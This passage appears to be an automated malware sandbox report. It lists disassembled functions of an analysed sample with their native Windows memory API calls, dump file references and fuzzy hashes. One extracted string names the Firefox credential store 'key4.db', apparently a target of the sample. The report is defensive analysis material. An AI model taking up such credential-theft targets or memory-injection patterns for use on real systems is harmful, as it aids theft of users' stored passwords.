                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C9E02
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C9E64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 421e0e014e143224588566eb03d51b6063bf7e5f5e136f6d99d86f9a55e710c6
                    • Instruction ID: ca6c59b26e1375ed6524cea6d0b70be9f425fc4cf2f945bcdeebfb46b078886c
                    • Opcode Fuzzy Hash: 421e0e014e143224588566eb03d51b6063bf7e5f5e136f6d99d86f9a55e710c6
                    • Instruction Fuzzy Hash: B361E271609241CFE725CF18D894B6AB3E9FBC8314F45866DE49A9B3E0C771E941CB81
                    Function 003E14A0 Relevance: 3.1, APIs: 2, Instructions: 110nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E15A2
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E15F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 6965800ad97a91b8b504ab7a8124b6998c1c37b187aac9a04346a811a95dd8dd
                    • Instruction ID: 6449049379f6865075cc5aa78fd81b16c029b4cabe3fcb3d59db6e4829719fe1
                    • Opcode Fuzzy Hash: 6965800ad97a91b8b504ab7a8124b6998c1c37b187aac9a04346a811a95dd8dd
                    • Instruction Fuzzy Hash: 503159B11093119FE305CF05C884B6BBBE8EB84358F158A1DF8A98B3D0D7B5D949CB92
                    Function 003C6492 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 003C6561
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C65CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: d66a9d6338a3047f72b49618d06dab52e5eb92c045a9b538b767dfaca9e576d2
                    • Instruction ID: a0017c1a943b89f2edcdb558605f2255713b18e471041f6d2b50d2d94c760290
                    • Opcode Fuzzy Hash: d66a9d6338a3047f72b49618d06dab52e5eb92c045a9b538b767dfaca9e576d2
                    • Instruction Fuzzy Hash: 2A318DB11083819FE325CF14C845B6BB7E9BB84314F104A2DE6A98B3D1CBB49909CB92
                    Function 003E1710 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E17D5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E181F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 5ea76a4a6339d6bc05f726adde391ecb7fd3f3b2f1eee07f04d43b8dc45ecc7d
                    • Instruction ID: 2bfac2a8aad244b1566bea1daf2e46f9e04a9a84c84bcf45d288fcee6cff0a21
                    • Opcode Fuzzy Hash: 5ea76a4a6339d6bc05f726adde391ecb7fd3f3b2f1eee07f04d43b8dc45ecc7d
                    • Instruction Fuzzy Hash: 5831CE71205314AFE326CF15C845B2FBBE8EB80354F19861CF9A88B3D0C7B59849CB92
                    Function 003C2700 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C28BC
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C2926
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: fba03102fb120dd67aaacf7b53be904260fde67292e7197239b74915968861dc
                    • Instruction ID: 18fcc77ec2959b5298565ec46ea11ba739ecc427d611fcd71747b3e323da7803
                    • Opcode Fuzzy Hash: fba03102fb120dd67aaacf7b53be904260fde67292e7197239b74915968861dc
                    • Instruction Fuzzy Hash: 09315A712407419FD326CF24C845F67B3E9AB84314F148B1CE6A69BBD0DBB5B805CBA0
                    Function 003CC5F0 Relevance: 3.1, APIs: 2, Instructions: 91nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CC68E
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CC6DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: ea91852f520593792458c5ef94fa33ff96d145bb7e425f9021a7de53deccacb0
                    • Instruction ID: e21eb138add9329cf2432613be1673e2cf2917262c4da16c58db1d14940b7568
                    • Opcode Fuzzy Hash: ea91852f520593792458c5ef94fa33ff96d145bb7e425f9021a7de53deccacb0
                    • Instruction Fuzzy Hash: 6D312675101B108FD335CF28C985B26B7F8FB48314F548A1CD6AAC7A90D7B5B805CB50
                    Function 003CEDB2 Relevance: 3.1, APIs: 2, Instructions: 90nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CEE44
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CEE93
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 91a59e262c3105cb4f2c4753a60d04683a283eb569a20b7cdfa194eebce76634
                    • Instruction ID: fb40e37e7c4945ecb6628b8256a1a7302a5e751292184a4bc0cf0fcbbac6c787
                    • Opcode Fuzzy Hash: 91a59e262c3105cb4f2c4753a60d04683a283eb569a20b7cdfa194eebce76634
                    • Instruction Fuzzy Hash: F821F271101B008FE725CF24C985F67B7F9BB48704F108A1DE5A68BAA0D7B4B908CB94
                    Function 003C7305 Relevance: 3.1, APIs: 2, Instructions: 84nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C73AC
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C73F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: c54056eb46a7d9f0fcbda7af763c341647035f7624d881e49389bec921a03fb8
                    • Instruction ID: d70bd9e853157b1ce9bd0c52086aedc3269003579355737a5f14d4ed60989ba3
                    • Opcode Fuzzy Hash: c54056eb46a7d9f0fcbda7af763c341647035f7624d881e49389bec921a03fb8
                    • Instruction Fuzzy Hash: 20318C711193819FD315CF18C880B6AB7E9FB88348F144A1CFAA5D73A0C7B5E905CB96
                    Function 003E1600 Relevance: 3.1, APIs: 2, Instructions: 81nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E16A5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E16EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 204a99081eac19257071fb9cb4bb73255d97f66f9b6362395107cc0fc9718994
                    • Instruction ID: 5d6e75cb8b712970513970c82decd5a4355a339f7ddb556bd0d2a344ce88ba40
                    • Opcode Fuzzy Hash: 204a99081eac19257071fb9cb4bb73255d97f66f9b6362395107cc0fc9718994
                    • Instruction Fuzzy Hash: 9B21FFB11093059FE311CF05C844B2BBBE8FB84304F058A1CF9A48B3D0C7B59948CBA2
                    Function 003C6790 Relevance: 3.1, APIs: 2, Instructions: 81nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 003C682A
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C6882
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 04437d4f3570691052f284f4cd7d77fc69762bf713baf8b64d4ba48c2eec98f9
                    • Instruction ID: 5252c28aee404896e445c48755bb3a9eedc5931fae1e8e2f39085c6153cbaac6
                    • Opcode Fuzzy Hash: 04437d4f3570691052f284f4cd7d77fc69762bf713baf8b64d4ba48c2eec98f9
                    • Instruction Fuzzy Hash: 38218EB12183408FE325CF14C845BAFB7E8FB89304F104A1CE5A99B391C7B49909CB92
                    Function 003DF1E0 Relevance: 3.1, APIs: 2, Instructions: 80nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003DF281
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003DF2DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 2b6279170fa6dbe38ccb25c6a003c6a62a0143b8c722d7043221d34affefb8bf
                    • Instruction ID: 0e5f004eed0728b9ef45a46f9a934e1523e51eea67beb6faff6ff038a032bc10
                    • Opcode Fuzzy Hash: 2b6279170fa6dbe38ccb25c6a003c6a62a0143b8c722d7043221d34affefb8bf
                    • Instruction Fuzzy Hash: BE219E76108301AFD301CF14D840B2FBBE8EB89354F108A1DFAA597390D3B1D944CBA2
                    Function 003C7C59 Relevance: 3.1, APIs: 2, Instructions: 80nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C7D03
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C7D46
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 9730111c946ec418bca7b27c3fbe911de3d52f1cc7f6312cb3c1be1d853ddfcb
                    • Instruction ID: 9b0529c3eee736e0d238017998e4d737d87202b5eec67f20e02e8f3149f8d51d
                    • Opcode Fuzzy Hash: 9730111c946ec418bca7b27c3fbe911de3d52f1cc7f6312cb3c1be1d853ddfcb
                    • Instruction Fuzzy Hash: 04318C71A1121A8FDB15CF98C885BEEB7B8FB08314F144218E921FB390C7B59A05CFA4
                    Function 003E1840 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E18E5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E193A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: df00cb3ab5990c7cb9628f9845e60fcfc483e8a6db40e3fcdbe839b2e2647862
                    • Instruction ID: 750ce10143a42f23cea497123087ec0788ee7b8b98ed4972da32daad9a70bc80
                    • Opcode Fuzzy Hash: df00cb3ab5990c7cb9628f9845e60fcfc483e8a6db40e3fcdbe839b2e2647862
                    • Instruction Fuzzy Hash: 9F218972108315AFD711CF14C884B6FBBE8EB84764F048A1DFAA587290D7B59D48CBA2
                    Function 003CF3FD Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: TaC
                    • API String ID: 0-130487730
                    • Opcode ID: 389cee3d4bbf4a6f4318e1813e99b7f08e89cadd41f2d742c30cc27bdceabc53
                    • Instruction ID: 256e0b18692ab636e8574e4a4a51544f5cf8fc3fe9e26ec55ce31c85879a58e6
                    • Opcode Fuzzy Hash: 389cee3d4bbf4a6f4318e1813e99b7f08e89cadd41f2d742c30cc27bdceabc53
                    • Instruction Fuzzy Hash: 35E1BDB1504B418FD322CF28C881B52BBE2BF49314F148B6DD5AA8BB92E735F845CB50
                    Function 003B64F0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: ,
                    • API String ID: 0-3772416878
                    • Opcode ID: 7bf9758f8d54414b0acb59c82a151e1dad3385d54cf96b2a23e51dbb0805f56c
                    • Instruction ID: 4a714e7d76b09042d885f3a6f8572e0b394ebc9cd42054e11fdb165f59018967
                    • Opcode Fuzzy Hash: 7bf9758f8d54414b0acb59c82a151e1dad3385d54cf96b2a23e51dbb0805f56c
                    • Instruction Fuzzy Hash: B1B15A711083859FD315CF28C84565BFBE0AFA9308F444A2DF59897782D375EA28CB96
                    Function 003C7A8C Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: \key4.db
                    • API String ID: 0-2908133219
                    • Opcode ID: 8ed7f3e0638b35094f87ca31b834958beedcdc7109c42454e8f02b1d63a1ea09
                    • Instruction ID: d90ae42f8380347e48b9712621b471252c55792d114972afb7de0c4d86a29f01
